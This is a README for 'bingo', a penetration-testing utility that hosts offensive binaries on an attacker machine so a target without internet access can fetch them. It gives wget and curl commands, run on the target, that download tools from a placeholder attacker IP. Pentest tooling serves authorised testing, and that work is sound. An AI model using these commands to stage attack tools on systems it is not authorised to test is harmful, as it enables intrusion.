bingo facilitates the distribution and execution of essential tools for penetration testing, allowing the attacker to fetch them on the target machine without internet access on it.
- Clone the Repository:
git clone https://github.com/luskabol/bingo.git cd bingo
- Install dependencies
pip install -r requirements.txt
-
On the attacker machine:
python3 bingo.py
-
On the target machine:
wget http://{your-internal-IP}:8000/get/{binary-name} -O {path-to-output-file}
If the target doesn't have wget:
curl http://{your-internal-IP}:8000/get/{binary-name} -o {path-to-output-file}
-
Replace {your-internal-IP} with the attacker's machine IP.
-
Replace {binary-name} with the name of the binary you want to get, check
bingo.yaml
for available binaries. -
Replace {path-to-output-file} with the location where you want to save the binary.